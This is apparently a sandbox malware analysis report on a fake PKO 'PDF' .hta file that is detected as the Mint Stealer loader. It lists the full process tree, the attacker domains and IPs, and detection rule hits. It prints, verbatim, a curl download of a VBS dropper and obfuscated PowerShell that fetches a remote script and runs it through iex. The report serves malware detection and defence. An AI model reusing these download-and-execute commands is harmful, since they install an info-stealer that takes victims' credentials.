Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta

Overview

General Information

Sample name:PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta
renamed because original name is a hash value
Original sample name:PKO_0019868519477_PDF_.hta
Analysis ID:1576834
MD5:8da85c61d9b033c0c6b99452a4d66976
SHA1:bf2e95e2c7d9e3690fcb323daefaba311021cea6
SHA256:0f2b38a3af80d5eb72b72f5b5dfe2e57d155608e64ec79f03b4ec58f81a851bc
Tags:htauser-cdcd
Infos:

Detection

Mint Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Mint Stealer
AI detected suspicious sample
Creates processes via WMI
Obfuscated command line found
Queries Google from non browser process on port 80
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7356 cmdline: mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7588 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curl.exe (PID: 7640 cmdline: curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
    • cmd.exe (PID: 7736 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7808 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • wscript.exe (PID: 8128 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js MD5: FF00E0480075B095948000BDC66E81F0)
    • cmd.exe (PID: 7828 cmdline: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7916 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
        • wscript.exe (PID: 8176 cmdline: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\pmxdhq.js MD5: FF00E0480075B095948000BDC66E81F0)
          • conhost.exe (PID: 6828 cmdline: conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp) MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 2800 cmdline: powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5224 cmdline: conhost --headless powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv) MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 3448 cmdline: powershell $wesvdclpag='ur' ;new-alias printout c$($wesvdclpag)l;$kiubxj=(8009,8021,8017,8021,8016,8023,8004,7962,8028,8009,7957,7952,8022,8017,8018,7953,7955,7952,8018,8010,8018,7969,8021,7967,8015,8011,8016,8022,8021,7956,7955);$yhgausrze=('bronx','get-cmdlet');$ibaoenpfqcwds=$kiubxj;foreach($capbmdvq in $ibaoenpfqcwds){$islyzgjwhrxt=$capbmdvq;$alhsoibwvkj=$alhsoibwvkj+[char]($islyzgjwhrxt-7906);$lkzfxe=$alhsoibwvkj; $wrbziekv=$lkzfxe};$mxhfwdcnuibzy[2]=$wrbziekv;$owqrhjdva='rl';$jpkizcrmv=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wrbziekv) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.1967997619.0000021C0FA47000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
    00000011.00000002.2002991318.0000015900228000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
      Process Memory Space: powershell.exe PID: 2800JoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security
        Process Memory Space: powershell.exe PID: 3448JoeSecurity_MintStealer_1Yara detected Mint StealerJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Legitimate Application Dropped Script
          Source: File createdAuthor: frack113, Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 7356, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\676198543e2f1[1].vbs
          Sigma detected: Script Initiated Connection to Non-Local Network
          Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 45.11.180.77, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7808, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
          Sigma detected: Script Interpreter Execution From Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7736, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , ProcessId: 7808, ProcessName: wscript.exe
          Sigma detected: Suspicious MSHTA Child Process
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, CommandLine|base64offset|contains: _, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7356, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, ProcessId: 7588, ProcessName: cmd.exe
          Sigma detected: Suspicious Script Execution From Temp Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js, CommandLine: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 7808, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\riodfc.js, ProcessId: 8128, ProcessName: wscript.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7736, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , ProcessId: 7808, ProcessName: wscript.exe
          Sigma detected: WScript or CScript Dropper - File
          Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\SysWOW64\wscript.exe, ProcessId: 7808, TargetFilename: C:\Users\user\AppData\Local\Temp\riodfc.js
          Sigma detected: Script Initiated Connection
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 45.11.180.77, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 7808, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
          Sigma detected: Usage Of Web Request Commands And Cmdlets
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, CommandLine|base64offset|contains: _, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7356, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\676198543e2f3.vbs https://pko-download.kagyouth.co.ke/676198543e20a/676198543e2f3.vbs, ProcessId: 7588, ProcessName: cmd.exe
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\676198543e2f3.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7736, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\676198543e2f3.vbs" , ProcessId: 7808, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp), CommandLine: powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: conhost --headless powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp), ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6828, ParentProcessName: conhost.exe, ProcessCommandLine: powershell $qlsaitfogcdk='ur' ;new-alias printout c$($qlsaitfogcdk)l;$bxcsrwklu=(9122,9134,9130,9134,9129,9136,9117,9075,9141,9122,9070,9065,9135,9130,9131,9066,9068,9065,9131,9123,9131,9082,9134,9080,9128,9124,9129,9135,9134,9069,9068);$qatenrdzxhfi=('bronx','get-cmdlet');$hepltzuk=$bxcsrwklu;foreach($vhrpuksybcwal in $hepltzuk){$rtqbhnzejclomf=$vhrpuksybcwal;$lsazfhgenmk=$lsazfhgenmk+[char]($rtqbhnzejclomf-9019);$zmsflnojqgtd=$lsazfhgenmk; $majklvetzswhbp=$zmsflnojqgtd};$ydrzolhea[2]=$majklvetzswhbp;$ruyhial='rl';$udsqxtw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $majklvetzswhbp), ProcessId: 2800, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-17T16:30:22.996815+010020570631A Network Trojan was detected192.168.2.449748193.149.129.6180TCP
          2024-12-17T16:30:23.043711+010020570631A Network Trojan was detected192.168.2.449749193.149.129.6180TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-17T16:30:22.996815+010020577431A Network Trojan was detected192.168.2.449748193.149.129.6180TCP
          2024-12-17T16:30:23.043711+010020577431A Network Trojan was detected192.168.2.449749193.149.129.6180TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.4% probability
          Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 45.11.180.77:443 -> 192.168.2.4:49740 version: TLS 1.2
          Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: tomation.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986687032.0000021C27D4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2057511026.000001596AF6D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdby source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 0000000F.00000002.1986687032.0000021C27D4A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2057511026.000001596AF6D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: utomation.pdbb< source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Core.pdbntVersion source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AFA3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbvice source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EA0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \mscorlib.pdb source: powershell.exe, 00000011.00000002.2057511026.000001596AEC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbZ& source: powershell.exe, 0000000F.00000002.1986024982.0000021C27CA3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb4 source: powershell.exe, 00000011.00000002.2059479627.000001596B16B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb` source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ows\System.Core.pdbpdb` source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbatP source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.2059479627.000001596B140000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27F06000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EA0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000011.00000002.2059479627.000001596B16B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ion.pdb source: powershell.exe, 0000000F.00000002.1986928715.0000021C27EB4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: nt.Automation.pdb-4437-8B11-F424491E3931}\InprocSe source: powershell.exe, 00000011.00000002.2057511026.000001596AEC4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: em.Core.pdb source: powershell.exe, 0000000F.00000002.1986547261.0000021C27D0E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 0000000F.00000002.1986251858.0000021C27CE3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbK source: powershell.exe, 00000011.00000002.2057511026.000001596AF20000.00000004.00000020.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.4:49749 -> 193.149.129.61:80
          Source: Network trafficSuricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49749 -> 193.149.129.61:80
          Source: Network trafficSuricata IDS: 2057063 - Severity 1 - ET MALWARE Mints.Loader CnC Activity (GET) : 192.168.2.4:49748 -> 193.149.129.61:80
          Source: Network trafficSuricata IDS: 2057743 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49748 -> 193.149.129.61:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 45.11.180.77 443
          Queries Google from non browser process on port 80
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: DANISCODK DANISCODK
          Source: Joe Sandbox ViewASN Name: M247GB M247GB
          Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /676198543e20a/js/676198543e135.js HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /676198543e20a/676198543e2f1.vbs HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pko-download.kagyouth.co.keConnection: Keep-Alive
